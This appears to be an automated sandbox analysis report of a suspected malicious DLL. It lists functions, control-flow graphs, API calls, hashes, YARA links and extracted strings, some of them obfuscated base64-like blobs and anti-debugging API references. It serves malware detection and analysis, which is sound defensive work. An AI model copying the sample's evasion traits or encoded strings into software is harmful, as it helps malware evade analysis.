                                                                                                                                                                              • Opcode Fuzzy Hash: f2b5a0f75455deb592f90d6f6b83c2309a395e0195de1749135b245b32b612ba
                                                                                                                                                                              • Instruction Fuzzy Hash: 48C13372A942058FCF0DCE7CC6A0BCD7BF2BB42314F11891AD425EBA95D775994ACB01
                                                                                                                                                                              Function 6D5CD2CE Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1440 6d5cd2ce-6d5cd2e1 call 6d5cdb80 1443 6d5cd2e7-6d5cd309 call 6d5cd768 1440->1443 1444 6d5cd2e3-6d5cd2e5 1440->1444 1448 6d5cd30b-6d5cd34e call 6d5cd833 call 6d5cd6ef call 6d5cdb4b call 6d5cd363 call 6d5cd9d4 call 6d5cd370 1443->1448 1449 6d5cd376-6d5cd38f call 6d5cda02 call 6d5cdb80 1443->1449 1445 6d5cd350-6d5cd35f 1444->1445 1448->1445 1460 6d5cd3a0-6d5cd3a7 1449->1460 1461 6d5cd391-6d5cd397 1449->1461 1464 6d5cd3a9-6d5cd3ac 1460->1464 1465 6d5cd3b3-6d5cd3c7 dllmain_raw 1460->1465 1461->1460 1463 6d5cd399-6d5cd39b 1461->1463 1468 6d5cd479-6d5cd488 1463->1468 1464->1465 1469 6d5cd3ae-6d5cd3b1 1464->1469 1470 6d5cd3cd-6d5cd3de dllmain_crt_dispatch 1465->1470 1471 6d5cd470-6d5cd477 1465->1471 1473 6d5cd3e4-6d5cd3f6 call 6d5c22c0 1469->1473 1470->1471 1470->1473 1471->1468 1479 6d5cd41f-6d5cd421 1473->1479 1480 6d5cd3f8-6d5cd3fa 1473->1480 1482 6d5cd428-6d5cd439 dllmain_crt_dispatch 1479->1482 1483 6d5cd423-6d5cd426 1479->1483 1480->1479 1481 6d5cd3fc-6d5cd41a call 6d5c22c0 call 6d5cd2ce dllmain_raw 1480->1481 1481->1479 1482->1471 1485 6d5cd43b-6d5cd46d dllmain_raw 1482->1485 1483->1471 1483->1482 1485->1471
                                                                                                                                                                              APIs
                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6D5CD315
                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6D5CD32F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                              • Opcode ID: 97dc587f2abcf5f0b60a0c9491d4f8bc78a805b376d32d77a929dc92082115e3
                                                                                                                                                                              • Instruction ID: d251a2d190574314e4bb446c2cf1fccbccf5f84b9f90a2fea9d9f3c49cf742b0
                                                                                                                                                                              • Opcode Fuzzy Hash: 97dc587f2abcf5f0b60a0c9491d4f8bc78a805b376d32d77a929dc92082115e3
                                                                                                                                                                              • Instruction Fuzzy Hash: 4E412572D88615EBDB188FE5CC80BAE76B4EBC1BA4F12441FEA14D7A40C7705D41CB92
                                                                                                                                                                              Function 6D5CD37E Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1553 6d5cd37e-6d5cd38f call 6d5cdb80 1556 6d5cd3a0-6d5cd3a7 1553->1556 1557 6d5cd391-6d5cd397 1553->1557 1559 6d5cd3a9-6d5cd3ac 1556->1559 1560 6d5cd3b3-6d5cd3c7 dllmain_raw 1556->1560 1557->1556 1558 6d5cd399-6d5cd39b 1557->1558 1561 6d5cd479-6d5cd488 1558->1561 1559->1560 1562 6d5cd3ae-6d5cd3b1 1559->1562 1563 6d5cd3cd-6d5cd3de dllmain_crt_dispatch 1560->1563 1564 6d5cd470-6d5cd477 1560->1564 1565 6d5cd3e4-6d5cd3f6 call 6d5c22c0 1562->1565 1563->1564 1563->1565 1564->1561 1568 6d5cd41f-6d5cd421 1565->1568 1569 6d5cd3f8-6d5cd3fa 1565->1569 1571 6d5cd428-6d5cd439 dllmain_crt_dispatch 1568->1571 1572 6d5cd423-6d5cd426 1568->1572 1569->1568 1570 6d5cd3fc-6d5cd41a call 6d5c22c0 call 6d5cd2ce dllmain_raw 1569->1570 1570->1568 1571->1564 1574 6d5cd43b-6d5cd46d dllmain_raw 1571->1574 1572->1564 1572->1571 1574->1564
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3136044242-0
                                                                                                                                                                              • Opcode ID: c47e190cd49cc28ea0e0c6bcdb5652384382cd04dae2c50441c2bdcfeeddc875
                                                                                                                                                                              • Instruction ID: bc26a96fef9039c1c5a28316f3cda68bc9d22586e44ff544c3f5ab8d3dc9193b
                                                                                                                                                                              • Opcode Fuzzy Hash: c47e190cd49cc28ea0e0c6bcdb5652384382cd04dae2c50441c2bdcfeeddc875
                                                                                                                                                                              • Instruction Fuzzy Hash: 66219172D85616ABDB298ED5CC80A7F3A78EBC1BD4B02451FFA14D7A10C7709D418BE2
                                                                                                                                                                              Function 6D5CD1C7 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1579 6d5cd1c7-6d5cd1d5 call 6d5cdb80 call 6d5cd863 1583 6d5cd1da-6d5cd1dd 1579->1583 1584 6d5cd2b4 1583->1584 1585 6d5cd1e3-6d5cd1fb call 6d5cd768 1583->1585 1587 6d5cd2b6-6d5cd2c5 1584->1587 1589 6d5cd2c6-6d5cd2cd call 6d5cda02 1585->1589 1590 6d5cd201-6d5cd212 call 6d5cd7c5 1585->1590 1595 6d5cd214-6d5cd236 call 6d5cdb1f call 6d5cd6e3 call 6d5cd707 call 6d5d1d89 1590->1595 1596 6d5cd261-6d5cd26f call 6d5cd2aa 1590->1596 1595->1596 1615 6d5cd238-6d5cd23f call 6d5cd79a 1595->1615 1596->1584 1601 6d5cd271-6d5cd27b call 6d5cd9fc 1596->1601 1607 6d5cd29c-6d5cd2a5 1601->1607 1608 6d5cd27d-6d5cd286 call 6d5cd923 1601->1608 1607->1587 1608->1607 1614 6d5cd288-6d5cd29a 1608->1614 1614->1607 1615->1596 1619 6d5cd241-6d5cd25e call 6d5d1d5e 1615->1619 1619->1596
                                                                                                                                                                              APIs
                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6D5CD214
                                                                                                                                                                                • Part of subcall function 6D5CD6E3: InitializeSListHead.KERNEL32(6D642CC0,6D5CD21E,6D5E0D80,00000010,6D5CD1AF,?,?,?,6D5CD3D7,?,00000001,?,?,00000001,?,6D5E0DC8), ref: 6D5CD6E8
                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D5CD27E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3231365870-0
                                                                                                                                                                              • Opcode ID: be86a26a881a72ced72731234983b3092e45bcab7f89ca7c2d77cf863629ade6
                                                                                                                                                                              • Instruction ID: 14c8142e03be36ad872d4428fb803bf0b5d4e43b3ab0d51d4a03bec2e8909a99
                                                                                                                                                                              • Opcode Fuzzy Hash: be86a26a881a72ced72731234983b3092e45bcab7f89ca7c2d77cf863629ade6
                                                                                                                                                                              • Instruction Fuzzy Hash: 6421C2326CC2069EDB0D7BF884007AC37B15BC622CF11441FD680E7DC1CF62598286A7
                                                                                                                                                                              Function 6D5D50E1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1622 6d5d50e1-6d5d50e6 1623 6d5d50e8-6d5d5100 1622->1623 1624 6d5d510e-6d5d5117 1623->1624 1625 6d5d5102-6d5d5106 1623->1625 1627 6d5d5129 1624->1627 1628 6d5d5119-6d5d511c 1624->1628 1625->1624 1626 6d5d5108-6d5d510c 1625->1626 1629 6d5d5183-6d5d5187 1626->1629 1632 6d5d512b-6d5d5138 GetStdHandle 1627->1632 1630 6d5d511e-6d5d5123 1628->1630 1631 6d5d5125-6d5d5127 1628->1631 1629->1623 1633 6d5d518d-6d5d5190 1629->1633 1630->1632 1631->1632 1634 6d5d513a-6d5d513c 1632->1634 1635 6d5d5165-6d5d5177 1632->1635 1634->1635 1636 6d5d513e-6d5d5147 GetFileType 1634->1636 1635->1629 1637 6d5d5179-6d5d517c 1635->1637 1636->1635 1638 6d5d5149-6d5d5152 1636->1638 1637->1629 1639 6d5d515a-6d5d515d 1638->1639 1640 6d5d5154-6d5d5158 1638->1640 1639->1629 1641 6d5d515f-6d5d5163 1639->1641 1640->1629 1641->1629
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 6D5D512D
                                                                                                                                                                              • GetFileType.KERNELBASE(00000000), ref: 6D5D513F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                                                              • Opcode ID: 63482330fade8a39e2d3572e8ba5e26a60be6bdda5ef305ebb2809cea3c2e614
                                                                                                                                                                              • Instruction ID: 1e389d1a8554bc3b0f8bb31497da440ef35ff06fc0d9716edf597d385e58b42a
                                                                                                                                                                              • Opcode Fuzzy Hash: 63482330fade8a39e2d3572e8ba5e26a60be6bdda5ef305ebb2809cea3c2e614
                                                                                                                                                                              • Instruction Fuzzy Hash: 6011B4316047525AC7748EBE8C88732BAA5FB47270B290F19D0F686EF1C730D4868269

                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                              Function 6D5CDA02 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D5CDA0E
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6D5CDADA
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D5CDAF3
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6D5CDAFD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                              • Opcode ID: 942a81aab558fe37d51c9d3fce017fce570f7b5da994d430d453a2d515f80cf7
                                                                                                                                                                              • Instruction ID: e85bdb22e5b567f834327ad073bf37ba9f3b2d521e0c11f8928966909be7db97
                                                                                                                                                                              • Opcode Fuzzy Hash: 942a81aab558fe37d51c9d3fce017fce570f7b5da994d430d453a2d515f80cf7
                                                                                                                                                                              • Instruction Fuzzy Hash: BC312575D45219DBDF20EFA4C849BCDBBB8AF48304F1041AAE50CAB640EB749A848F55
                                                                                                                                                                              Function 6D5B3370 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: =&$G=)#$GVydQAAAABzcGFuaXNoLXBhcmFndWF5AAAAAHNwYW5pc2gtcGFuYW1hAABzcGFuaXNoLW5pY2FyYWd1YQAAAHNwYW5pc2gtbW9kZXJuAABzcGFuaXNoLW1leGljYW4Ac3B$wydniskkiubezlkwvqgojxpilsggfwgcqedjmuanaxnznjoufauopuhiseqm
                                                                                                                                                                              • API String ID: 0-3632998398
                                                                                                                                                                              • Opcode ID: 84c328e95df9ad3eb88070875ee6795a7470bca84369c93d58f4025bb943449b
                                                                                                                                                                              • Instruction ID: 5434e6ba115b6feb18d33cd5c7a694166ce880ba7c8ad0c19379cf94298e712a
                                                                                                                                                                              • Opcode Fuzzy Hash: 84c328e95df9ad3eb88070875ee6795a7470bca84369c93d58f4025bb943449b
                                                                                                                                                                              • Instruction Fuzzy Hash: FB62C2722946018FD71DCE3CC6A539A7BF2AB46310F008E1DE4A6DBF94D739E9498B11
                                                                                                                                                                              Function 6D5CA030 Relevance: 5.5, Strings: 4, Instructions: 542COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • Yx42y+VcOMe2pQE4xaXXqSkpKQe2pQebp6joxhdi2hhi5QfHKOjo5Tt25TtYYt42y+VcOMe2pQE4xaXXqSkpKQe2pQem56jo5TtVYqU7WGKeNsvlXDjHtqUBOMWl16kpKS, xrefs: 6D5CA168, 6D5CA534
                                                                                                                                                                              • kx3, xrefs: 6D5CA2FA
                                                                                                                                                                              • vp`", xrefs: 6D5CA045
                                                                                                                                                                              • vp`", xrefs: 6D5CA5D3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Yx42y+VcOMe2pQE4xaXXqSkpKQe2pQebp6joxhdi2hhi5QfHKOjo5Tt25TtYYt42y+VcOMe2pQE4xaXXqSkpKQe2pQem56jo5TtVYqU7WGKeNsvlXDjHtqUBOMWl16kpKS$kx3$vp`"$vp`"
                                                                                                                                                                              • API String ID: 0-4068181963
                                                                                                                                                                              • Opcode ID: b41dd0fe3b60a396757b69da372155bc714bf6032916a3c353e5100b6189c7e0
                                                                                                                                                                              • Instruction ID: 8b68328600f48e915edaef6f20b82bc2236dd5360b23135807adf74e72ccc521
                                                                                                                                                                              • Opcode Fuzzy Hash: b41dd0fe3b60a396757b69da372155bc714bf6032916a3c353e5100b6189c7e0
                                                                                                                                                                              • Instruction Fuzzy Hash: 9C02F436A641018FCB09CEFCC994FEE7FF1BB46364F109A1DD421E7B94D62A89458B12
                                                                                                                                                                              Function 6D5C6B60 Relevance: 5.3, Strings: 4, Instructions: 295COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 6\5W$6\5W$vBUu$vBUu
                                                                                                                                                                              • API String ID: 0-2008447811
                                                                                                                                                                              • Opcode ID: c42dfe34360a6c3d447b8d016a630c8faa3881c6ab5e664b24356d97570ca305
                                                                                                                                                                              • Instruction ID: 5f3171e97771bd8f4972a92c8f6e2a592d775c389975e626ab1919279d1a3de6
                                                                                                                                                                              • Opcode Fuzzy Hash: c42dfe34360a6c3d447b8d016a630c8faa3881c6ab5e664b24356d97570ca305
                                                                                                                                                                              • Instruction Fuzzy Hash: F4A12571A442058FDF09CEFCC5A53EE7BF1EB4A324F10991DD415EB764C3268A498BA2
                                                                                                                                                                              Function 6D5D199C Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D5D1A94
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D5D1A9E
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D5D1AAB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                              • Opcode ID: 5584e61f1bedc3c3639b7115a4b6daaa30ac3a4b3e27ea7c78fc1c27acd206f5
                                                                                                                                                                              • Instruction ID: 3b7fcec1e00388ae204ba9d4757d9fb3d6d566a5c08be57c06c9f008afeca731
                                                                                                                                                                              • Opcode Fuzzy Hash: 5584e61f1bedc3c3639b7115a4b6daaa30ac3a4b3e27ea7c78fc1c27acd206f5
                                                                                                                                                                              • Instruction Fuzzy Hash: 8231D274941229ABCB25DF68D888B8DBBF8BF48310F5041EAE41CA7290E7749F858F55
                                                                                                                                                                              Function 6D5C3330 Relevance: 4.1, Strings: 3, Instructions: 378COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .Ua$55-$55-
                                                                                                                                                                              • API String ID: 0-2115185444
                                                                                                                                                                              • Opcode ID: 74999e32c60f3f4ed4c140069a04199f795e4bddfcdf8ec522681b9f35c048b5
                                                                                                                                                                              • Instruction ID: b9daf8e8d6bf04d0e0a871347735a2639daecacde41c06ce39e7a659af975965
                                                                                                                                                                              • Opcode Fuzzy Hash: 74999e32c60f3f4ed4c140069a04199f795e4bddfcdf8ec522681b9f35c048b5
                                                                                                                                                                              • Instruction Fuzzy Hash: DCD18875A646099FDB09CFECD9D06EDBBF2BB4A710F10882DE401EB750D635A845CB02
                                                                                                                                                                              Function 6D5B4CF0 Relevance: 4.0, Strings: 3, Instructions: 289COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: fjvukrfkipsuhgfrcaiuctsmyuqn$lfwghlwqmupf$qtgutkrmmcqftvjr
                                                                                                                                                                              • API String ID: 0-1848510846
                                                                                                                                                                              • Opcode ID: a5a49f935643ae55e08fb952c66b3e353629c1e94ead785b736acc3a27a5f254
                                                                                                                                                                              • Instruction ID: ea617b3d5e5f711de0f96dc55a701d9c9c31b6fbe543c06ea19cbb15d1a546a9
                                                                                                                                                                              • Opcode Fuzzy Hash: a5a49f935643ae55e08fb952c66b3e353629c1e94ead785b736acc3a27a5f254
                                                                                                                                                                              • Instruction Fuzzy Hash: F1B1A7B1610B018FDB28DF28C5907A6BBF1FB4A314F018A2DC5968BB51D735F849CB52
                                                                                                                                                                              Function 6D5B5D00 Relevance: 4.0, Strings: 3, Instructions: 267COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
